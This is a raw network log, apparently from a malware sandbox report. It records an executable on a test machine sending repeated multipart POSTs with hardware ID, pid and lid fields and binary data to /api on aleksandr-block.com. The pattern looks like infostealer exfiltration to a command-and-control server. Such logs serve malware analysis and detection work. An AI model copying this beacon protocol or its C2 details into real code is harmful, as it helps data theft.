2025-01-14 07:55:33 UTC | 242 | IN | Data Raw: 31 34 38 32 0d 0a 52 51 4e 53 4c 70 50 58 2b 42 6c 6d 2f 36 74 46 38 71 79 48 4f 58 32 2f 46 79 59 49 39 48 59 6a 6e 4e 76 74 74 58 6e 53 66 64 59 2b 49 53 51 4d 71 65 50 55 4f 78 57 61 69 58 2b 47 33 76 4a 63 55 5a 31 32 51 69 72 4f 45 45 4c 77 71 49 69 5a 57 36 51 51 39 48 39 6c 4d 30 4c 67 73 74 51 37 41 34 65 4a 66 36 6e 58 70 56 77 54 6e 53 30 45 62 5a 34 55 51 76 43 35 6a 4e 34 57 6f 68 47 31 4c 57 38 31 52 76 61 30 6e 48 67 4b 6b 73 34 67 6c 38 33 74 56 78 54 53 66 30 73 71 32 46 52 47 35 76 6e 58 6c 7a 53 33 43 62 63 49 59 69 46 46 73 61 72 55 59 6b 53 61 78 57 66 49 6a 75 5a 63 48 39 4e 78 51 6d 4f 63 48 6b 76 34 75 49 6e 66 43 62 73 62 76 69 31 68 4e 6b 66 38 76 59 68 31 41 4a 58 46 4a 70 33 4e 70 52 56 66
  Data Ascii: 1482RQNSLpPX+Blm/6tF8qyHOX2/FyYI9HYjnNvttXnSfdY+ISQMqePUOxWaiX+G3vJcUZ12QirOEELwqIiZW6QQ9H9lM0LgstQ7A4eJf6nXpVwTnS0EbZ4UQvC5jN4WohG1LW81Rva0nHgKks4gl83tVxTSf0sq2FRG5vnXlzS3CbcIYiFFsarUYkSaxWfIjuZcH9NxQmOcHkv4uInfCbsbvi1hNkf8vYh1AJXFJp3NpRVf
2025-01-14 07:55:33 UTC | 1369 | IN | Data Raw: 32 6d 30 45 4d 74 5a 48 63 2f 32 6f 6e 73 49 57 6f 42 6e 30 4f 43 38 70 44 50 61 35 32 69 4e 45 6c 63 55 70 6c 63 33 71 58 42 37 64 5a 30 74 71 6c 52 78 4a 2b 72 4f 41 32 42 53 2b 46 62 4d 76 61 44 64 44 39 72 32 63 64 41 66 64 68 32 65 58 31 71 55 44 58 2f 31 6c 52 32 6d 43 47 56 43 2b 70 73 48 4f 57 37 63 54 39 48 38 68 4e 6b 4c 77 75 4a 70 70 44 4a 62 43 49 6f 4c 46 37 46 59 53 33 58 68 4f 5a 5a 55 55 52 76 53 7a 67 4e 30 66 76 52 4b 79 4a 32 46 77 41 72 47 79 67 6a 74 63 33 65 6f 69 67 4d 6e 70 54 56 33 6e 4e 56 73 6b 6a 31 52 47 38 76 6e 58 6c 78 4f 31 48 4c 63 73 62 6a 4e 45 2b 71 65 61 61 51 4b 51 7a 44 57 57 79 2b 74 52 48 4d 39 2f 53 6d 79 56 48 55 72 33 76 49 6a 54 57 2f 35 66 73 7a 38 68 61 41 7a 51 75 4a 46 33 44 6f 72 4a 5a 34 2b 41 2f 42 73
  Data Ascii: 2m0EMtZHc/2onsIWoBn0OC8pDPa52iNElcUplc3qXB7dZ0tqlRxJ+rOA2BS+FbMvaDdD9r2cdAfdh2eX1qUDX/1lR2mCGVC+psHOW7cT9H8hNkLwuJppDJbCIoLF7FYS3XhOZZUURvSzgN0fvRKyJ2FwArGygjtc3eoigMnpTV3nNVskj1RG8vnXlxO1HLcsbjNE+qeaaQKQzDWWy+tRHM9/SmyVHUr3vIjTW/5fsz8haAzQuJF3DorJZ4+A/Bs
2025-01-14 07:55:33 UTC | 1369 | IN | Data Raw: 6d 79 5a 47 55 32 2b 39 38 2f 51 41 2f 42 48 39 41 31 69 4a 45 2f 37 39 36 39 34 43 70 50 4f 4d 64 44 52 71 30 4a 66 32 6e 6b 45 4d 74 59 5a 51 50 61 2f 6e 64 67 57 73 78 47 36 4b 47 51 2f 52 50 47 31 6c 33 34 41 6c 73 49 6b 6e 63 72 33 55 52 2f 56 63 45 56 67 6e 46 51 50 76 72 36 58 6c 30 50 77 4c 71 4d 73 49 77 56 50 2f 37 75 64 62 55 53 43 68 7a 37 51 79 65 6b 62 52 35 31 34 54 47 2b 54 47 30 44 30 74 34 72 64 46 37 67 52 74 7a 56 75 4e 45 7a 39 76 5a 42 32 43 70 6e 42 4c 70 76 46 34 31 73 65 31 7a 55 4b 4b 70 45 4d 41 61 62 35 75 39 41 58 76 52 44 32 45 6d 49 2b 51 76 61 6a 32 6d 52 4b 68 49 6b 67 6e 49 36 39 47 78 50 55 64 55 39 67 6b 68 52 47 38 37 79 4d 30 42 69 39 47 4c 34 70 5a 6a 52 41 2b 4c 69 63 65 77 4f 5a 7a 44 57 56 78 2b 6c 58 58 35 4d 31
  Data Ascii: myZGU2+98/QA/BH9A1iJE/79694CpPOMdDRq0Jf2nkEMtYZQPa/ndgWsxG6KGQ/RPG1l34AlsIkncr3UR/VcEVgnFQPvr6Xl0PwLqMsIwVP/7udbUSChz7QyekbR514TG+TG0D0t4rdF7gRtzVuNEz9vZB2CpnBLpvF41se1zUKKpEMAab5u9AXvRD2EmI+Qvaj2mRKhIkgnI69GxPUdU9gkhRG87yM0Bi9GL4pZjRA+LicewOZzDWVx+lXX5M1
2025-01-14 07:55:33 UTC | 1369 | IN | Data Raw: 70 59 76 72 36 44 6c 30 50 77 46 72 30 31 62 7a 35 46 2f 4c 4f 53 66 41 71 51 77 69 47 62 79 65 4a 64 45 74 56 34 51 57 6d 58 45 45 76 73 75 6f 54 64 46 72 70 66 2b 6d 64 6d 4b 41 79 70 39 62 31 33 4c 59 33 53 4e 59 61 4f 2b 68 55 47 6e 58 4a 49 4b 73 35 55 51 76 47 77 67 4e 38 54 76 78 43 77 4b 57 63 32 51 66 53 36 6b 47 6b 4d 6b 38 51 73 6e 38 58 33 57 78 4c 5a 65 55 42 69 6e 52 34 42 73 50 6d 49 7a 31 76 6f 58 34 45 71 62 6a 42 50 35 2f 57 46 4e 52 33 64 7a 69 76 51 6c 71 56 58 45 64 31 36 53 47 61 64 48 45 44 79 74 34 6a 53 45 72 67 58 70 69 5a 6c 4f 45 33 2f 75 70 74 2f 41 5a 6a 4e 49 4a 54 49 36 68 74 52 6e 58 4a 63 4b 73 35 55 62 74 6d 4d 7a 66 59 68 38 41 44 36 50 69 45 33 51 4c 48 74 32 6e 63 48 6b 63 45 6f 6c 73 66 70 55 52 62 57 65 55 39 75 6d
  Data Ascii: pYvr6Dl0PwFr01bz5F/LOSfAqQwiGbyeJdEtV4QWmXEEvsuoTdFrpf+mdmKAyp9b13LY3SNYaO+hUGnXJIKs5UQvGwgN8TvxCwKWc2QfS6kGkMk8Qsn8X3WxLZeUBinR4BsPmIz1voX4EqbjBP5/WFNR3dzivQlqVXEd16SGadHEDyt4jSErgXpiZlOE3/upt/AZjNIJTI6htRnXJcKs5UbtmMzfYh8AD6PiE3QLHt2ncHkcEolsfpURbWeU9um
2025-01-14 07:55:33 UTC | 909 | IN | Data Raw: 32 6a 74 59 64 6f 68 69 39 4e 57 38 39 51 2f 6d 39 6b 33 6f 41 6d 4d 51 68 6e 4d 54 6b 58 42 48 54 66 51 51 6b 31 68 4e 5a 76 75 48 50 39 67 75 72 44 61 49 71 51 44 31 44 73 61 72 55 59 6b 53 61 78 57 66 49 6a 75 78 4a 47 39 42 6e 54 57 32 59 47 30 4c 73 75 49 4c 63 43 62 63 51 73 43 42 74 4e 6b 50 33 74 4a 39 78 43 4a 72 4d 4c 4a 2f 43 70 52 56 66 32 6d 30 45 4d 74 59 36 53 75 32 75 6a 4e 6b 51 70 67 54 30 4f 43 38 70 44 50 61 35 32 69 4e 45 6e 73 49 73 6c 4d 37 70 57 78 76 51 64 56 5a 6c 6b 52 4e 49 39 61 75 46 30 42 79 37 46 37 38 6f 5a 79 4a 41 2f 36 65 66 61 52 62 64 68 32 65 58 31 71 55 44 58 2b 74 79 56 48 71 56 56 6e 44 6f 75 70 6e 63 46 72 78 66 71 32 6c 34 63 45 76 39 39 63 49 37 41 70 4c 41 4a 4a 2f 50 37 46 63 53 32 48 78 42 61 35 41 51 53 2f
  Data Ascii: 2jtYdohi9NW89Q/m9k3oAmMQhnMTkXBHTfQQk1hNZvuHP9gurDaIqQD1DsarUYkSaxWfIjuxJG9BnTW2YG0LsuILcCbcQsCBtNkP3tJ9xCJrMLJ/CpRVf2m0EMtY6Su2ujNkQpgT0OC8pDPa52iNEnsIslM7pWxvQdVZlkRNI9auF0By7F78oZyJA/6efaRbdh2eX1qUDX+tyVHqVVnDoupncFrxfq2l4cEv99cI7ApLAJJ/P7FcS2HxBa5AQS/
2025-01-14 07:55:33 UTC | 1369 | IN | Data Raw: 33 35 31 32 0d 0a 45 32 52 76 57 32 6b 33 67 44 6c 4d 38 73 6b 38 54 71 58 42 6e 5a 64 55 39 74 6d 42 4a 45 39 62 44 50 6d 56 75 33 42 2f 52 2f 49 52 5a 76 34 36 65 6f 64 51 65 47 69 54 6a 65 31 36 56 63 45 35 30 74 42 47 47 65 47 31 50 37 73 49 66 54 45 72 41 62 76 69 70 6d 4d 45 6e 38 73 4a 35 31 41 4a 72 4a 4b 35 2f 4a 37 56 51 62 33 58 6f 45 4a 4e 59 54 57 62 37 68 7a 2f 63 51 70 6a 36 36 4c 48 4e 77 55 37 2b 73 32 6e 77 49 33 5a 46 6e 6e 73 66 6b 55 78 48 52 66 55 42 34 6c 68 39 49 38 62 69 41 31 78 69 78 46 62 77 31 5a 7a 42 48 2b 62 4b 53 66 77 71 50 79 43 6a 51 67 4b 56 63 42 35 30 74 42 46 75 41 45 30 62 78 2b 36 62 51 41 4c 45 56 74 79 78 74 63 46 4f 2f 72 4e 70 38 43 4e 32 52 5a 35 33 43 36 46 38 4e 30 58 56 45 59 35 45 65 55 2f 47 32 67 74 51
  Data Ascii: 3512E2RvW2k3gDlM8sk8TqXBnZdU9tmBJE9bDPmVu3B/R/IRZv46eodQeGiTje16VcE50tBGGeG1P7sIfTErAbvipmMEn8sJ51AJrJK5/J7VQb3XoEJNYTWb7hz/cQpj66LHNwU7+s2nwI3ZFnnsfkUxHRfUB4lh9I8biA1xixFbw1ZzBH+bKSfwqPyCjQgKVcB50tBFuAE0bx+6bQALEVtyxtcFO/rNp8CN2RZ53C6F8N0XVEY5EeU/G2gtQ
2025-01-14 07:55:33 UTC | 1369 | IN | Data Raw: 6a 56 67 4f 6b 44 77 73 70 31 77 46 70 62 62 4c 4a 6a 4e 36 31 4d 57 33 58 74 45 61 35 73 55 41 62 44 35 69 4d 39 62 36 46 2b 52 42 48 59 6d 52 72 4f 57 6a 57 30 4f 6d 73 55 78 6d 38 2f 6d 54 52 4c 4e 4e 51 6f 71 68 78 4e 51 76 75 47 5a 78 77 79 33 41 50 6f 2b 49 54 64 41 73 65 33 61 63 41 75 54 78 43 79 55 78 2b 42 54 48 4e 68 77 54 6d 61 61 46 55 6e 33 73 34 72 53 48 62 6f 63 75 69 68 67 50 45 6a 34 75 35 4d 37 53 74 33 4f 50 39 43 57 70 57 30 50 32 6d 31 4a 65 74 51 6d 51 75 2b 6f 6d 74 6f 4c 74 6c 32 62 4a 47 30 7a 53 66 61 6c 32 6d 52 4b 68 49 6b 67 6e 49 36 39 47 78 2f 5a 65 55 64 74 6d 42 74 4d 38 62 36 45 32 42 47 2b 44 62 73 69 61 54 78 45 2f 4b 65 51 63 52 61 55 77 43 71 65 78 76 64 59 58 35 4d 31 51 33 4c 57 54 41 48 4d 73 34 7a 62 44 62 30 51
  Data Ascii: jVgOkDwsp1wFpbbLJjN61MW3XtEa5sUAbD5iM9b6F+RBHYmRrOWjW0OmsUxm8/mTRLNNQoqhxNQvuGZxwy3APo+ITdAse3acAuTxCyUx+BTHNhwTmaaFUn3s4rSHbocuihgPEj4u5M7St3OP9CWpW0P2m1JetQmQu+omtoLtl2bJG0zSfal2mRKhIkgnI69Gx/ZeUdtmBtM8b6E2BG+DbsiaTxE/KeQcRaUwCqexvdYX5M1Q3LWTAHMs4zbDb0Q
2025-01-14 07:55:33 UTC | 1369 | IN | Data Raw: 42 35 38 72 75 55 66 42 4b 4d 68 41 61 64 78 65 6c 57 45 4e 59 31 43 69 71 51 56 42 6d 75 39 38 2f 54 43 76 42 48 35 48 55 36 5a 52 2b 6d 35 63 68 6b 53 6f 53 4a 4d 64 43 57 74 78 56 66 7a 7a 55 63 4b 74 45 58 55 2b 79 2f 6a 4d 45 59 39 79 47 4b 42 48 59 6d 52 75 72 33 76 48 77 56 6c 4e 38 71 67 76 44 62 64 52 4c 63 64 6b 6f 6f 70 77 4a 4d 37 72 71 4b 30 43 57 4f 45 62 4d 7a 5a 6a 35 4b 38 66 58 55 4f 77 76 64 6b 52 37 51 68 71 56 6b 55 5a 31 74 42 44 4c 57 49 55 4c 77 74 34 6a 42 43 76 30 38 6f 7a 46 72 4b 77 37 58 73 6f 74 79 45 70 44 62 5a 39 36 4f 34 78 74 48 6a 54 73 45 62 6f 64 55 47 61 37 72 31 49 4a 49 35 30 2f 6d 4f 43 38 70 44 4f 66 31 77 69 6c 4b 33 64 74 6e 79 49 36 69 57 41 33 50 63 30 64 38 6c 56 4e 2f 77 4a 6d 45 77 52 71 39 46 4c 67 5a 58
  Data Ascii: B58ruUfBKMhAadxelWENY1CiqQVBmu98/TCvBH5HU6ZR+m5chkSoSJMdCWtxVfzzUcKtEXU+y/jMEY9yGKBHYmRur3vHwVlN8qgvDbdRLcdkoopwJM7rqK0CWOEbMzZj5K8fXUOwvdkR7QhqVkUZ1tBDLWIULwt4jBCv08ozFrKw7XsotyEpDbZ96O4xtHjTsEbodUGa7r1IJI50/mOC8pDOf1wilK3dtnyI6iWA3Pc0d8lVN/wJmEwRq9FLgZX
2025-01-14 07:55:33 UTC | 1369 | IN | Data Raw: 6e 68 54 55 64 33 64 39 6e 79 4a 79 72 47 77 32 64 4c 51 51 74 6c 51 5a 54 2b 4c 71 5a 31 46 79 4f 49 59 45 6b 62 7a 35 4c 35 34 43 5a 61 67 65 64 77 68 6d 75 37 2b 74 51 47 4e 46 6a 65 6c 53 6a 46 30 2f 77 76 70 6e 47 57 2f 35 66 75 32 63 35 43 51 79 35 39 61 55 31 52 49 57 4a 66 39 44 37 35 6c 55 52 32 6d 4e 56 4a 36 4d 58 55 50 32 35 68 4a 64 56 38 42 6e 30 66 7a 4e 2b 44 50 57 6b 32 69 4e 55 7a 35 4a 79 77 35 6d 31 43 51 43 54 62 41 52 38 31 6b 77 54 73 50 6d 64 6c 30 50 77 57 4c 63 31 63 7a 5a 50 35 37 62 64 52 54 71 37 79 69 43 57 7a 65 74 4d 44 70 39 61 52 32 47 61 47 45 62 6f 68 37 48 43 47 4c 34 52 73 7a 46 77 63 41 4b 78 75 74 6f 6a 50 64 33 59 4c 5a 65 43 72 52 63 4f 7a 6e 74 50 66 4a 46 55 66 72 44 35 6c 35 64 44 38 43 71 33 4b 57 38 33 57 75
  Data Ascii: nhTUd3d9nyJyrGw2dLQQtlQZT+LqZ1FyOIYEkbz5L54CZagedwhmu7+tQGNFjelSjF0/wvpnGW/5fu2c5CQy59aU1RIWJf9D75lUR2mNVJ6MXUP25hJdV8Bn0fzN+DPWk2iNUz5Jyw5m1CQCTbAR81kwTsPmdl0PwWLc1czZP57bdRTq7yiCWzetMDp9aR2GaGEboh7HCGL4RszFwcAKxutojPd3YLZeCrRcOzntPfJFUfrD5l5dD8Cq3KW83Wu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49812 | 188.114.96.3 | 443 | 7532 | C:\Users\user\Desktop\yTRd6nkLWV.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-14 07:55:34 UTC | 280 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=RC6TGEQHH2SEL
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 12812
  Host: aleksandr-block.com
2025-01-14 07:55:34 UTC | 12812 | OUT | Data Raw: 2d 2d 52 43 36 54 47 45 51 48 48 32 53 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 33 44 35 36 37 30 38 38 37 31 36 32 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 52 43 36 54 47 45 51 48 48 32 53 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 43 36 54 47 45 51 48 48 32 53 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 34 53 0d 0a 2d 2d 52 43 36 54 47 45 51 48 48 32 53 45 4c
  Data Ascii: --RC6TGEQHH2SELContent-Disposition: form-data; name="hwid"5F3D56708871628FB960CC18D99B375A--RC6TGEQHH2SELContent-Disposition: form-data; name="pid"2--RC6TGEQHH2SELContent-Disposition: form-data; name="lid"BbL7Kk--04S--RC6TGEQHH2SEL
2025-01-14 07:55:35 UTC | 1130 | IN | HTTP/1.1 200 OK
  Date: Tue, 14 Jan 2025 07:55:34 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=cent8m77v67f1kkqtr9n46al2a; expires=Sat, 10 May 2025 01:42:13 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CR9thD4YJXzTeHmkyGNXRJkDLzFQ7W9MT9tY9MDspRGzdnw8pTqVstv%2B3r12Y24rUzWvYN%2F9ULFD%2FNEcs6P%2FsuPdCXi47oG8xagpKD3KaLxzQWCdZcrHg6jG05eOBo8utyRfbnTF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 901c10832895439f-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1545&rtt_var=593&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13750&delivery_rate=1822721&cwnd=241&unsent_bytes=0&cid=5c4b70f3f9f57844&ts=820&x=0"
                                                                                                                                                                                                                                                  2025-01-14 07:55:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-14 07:55:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49825 | 188.114.96.3 | 443 | 7532 | C:\Users\user\Desktop\yTRd6nkLWV.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-14 07:55:35 UTC | 281 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=URVIBBBZEWIGER
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15050
    Host: aleksandr-block.com
2025-01-14 07:55:35 UTC | 15050 | OUT | Data Raw: 2d 2d 55 52 56 49 42 42 42 5a 45 57 49 47 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 33 44 35 36 37 30 38 38 37 31 36 32 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 55 52 56 49 42 42 42 5a 45 57 49 47 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 52 56 49 42 42 42 5a 45 57 49 47 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 34 53 0d 0a 2d 2d 55 52 56 49 42 42 42 5a 45 57
    Data Ascii: --URVIBBBZEWIGERContent-Disposition: form-data; name="hwid"5F3D56708871628FB960CC18D99B375A--URVIBBBZEWIGERContent-Disposition: form-data; name="pid"2--URVIBBBZEWIGERContent-Disposition: form-data; name="lid"BbL7Kk--04S--URVIBBBZEW
2025-01-14 07:55:36 UTC | 1134 | IN | HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 07:55:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=shnma8aio03pmgmvpv8fs0otac; expires=Sat, 10 May 2025 01:42:15 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvLuvZ0sLIEBp%2BQ0jRuWbsRFy6d8YH1UfCtCNDMbUSarfCdSf3%2BjDswvr6%2Ft3%2BzJKrycxbntHOLwGQx%2BA0FsoDcpYNPud72xwQZu3iUIz%2Brce9wmVTbwKvHIjOQfGrLogjTZyjU2"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 901c108cff967d02-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1972&rtt_var=754&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15989&delivery_rate=1437007&cwnd=230&unsent_bytes=0&cid=59ea599b3508e224&ts=546&x=0"
2025-01-14 07:55:36 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-14 07:55:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49838 | 188.114.96.3 | 443 | 7532 | C:\Users\user\Desktop\yTRd6nkLWV.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-14 07:55:37 UTC | 275 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=F18QAAKN
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20339
    Host: aleksandr-block.com
2025-01-14 07:55:37 UTC | 15331 | OUT | Data Raw: 2d 2d 46 31 38 51 41 41 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 33 44 35 36 37 30 38 38 37 31 36 32 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 46 31 38 51 41 41 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 31 38 51 41 41 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 34 53 0d 0a 2d 2d 46 31 38 51 41 41 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
    Data Ascii: --F18QAAKNContent-Disposition: form-data; name="hwid"5F3D56708871628FB960CC18D99B375A--F18QAAKNContent-Disposition: form-data; name="pid"3--F18QAAKNContent-Disposition: form-data; name="lid"BbL7Kk--04S--F18QAAKNContent-Dispositio
2025-01-14 07:55:37 UTC | 5008 | OUT | Data Raw: d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9f be 7b 92 87 e3 95 6a 69
    Data Ascii: K~`iO\_,mi`m?ls}Qm/X2x){ji
2025-01-14 07:55:37 UTC | 1139 | IN | HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 07:55:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=m3j07v5lo3ttnuhc89d00jfsgj; expires=Sat, 10 May 2025 01:42:16 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MZzmyNMkS%2FTExDstaIK%2F%2BrQlik%2B5KF%2BF0kDHy91KqObzRF2%2FrzowwbEsj%2B7KTT8ReygNCK6Bc1qLTgeC94wis6B3%2FrScWz9SvjQCpWhjuBBgRu5H2iku4Wk9bgPVDr01ChrYLTIJ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 901c1095afd50f8f-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1666&rtt_var=631&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21294&delivery_rate=1726788&cwnd=232&unsent_bytes=0&cid=31f866241665749b&ts=614&x=0"
2025-01-14 07:55:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-14 07:55:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.749849188.114.96.34437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:38 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=IB5T9XD3ZG7CKB
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 1345
                                                                                                                                                                                                                                                  Host: aleksandr-block.com
2025-01-14 07:55:38 UTC  1345  OUT  Data Ascii: --IB5T9XD3ZG7CKBContent-Disposition: form-data; name="hwid"5F3D56708871628FB960CC18D99B375A--IB5T9XD3ZG7CKBContent-Disposition: form-data; name="pid"1--IB5T9XD3ZG7CKBContent-Disposition: form-data; name="lid"BbL7Kk--04S--IB5T9XD3ZG
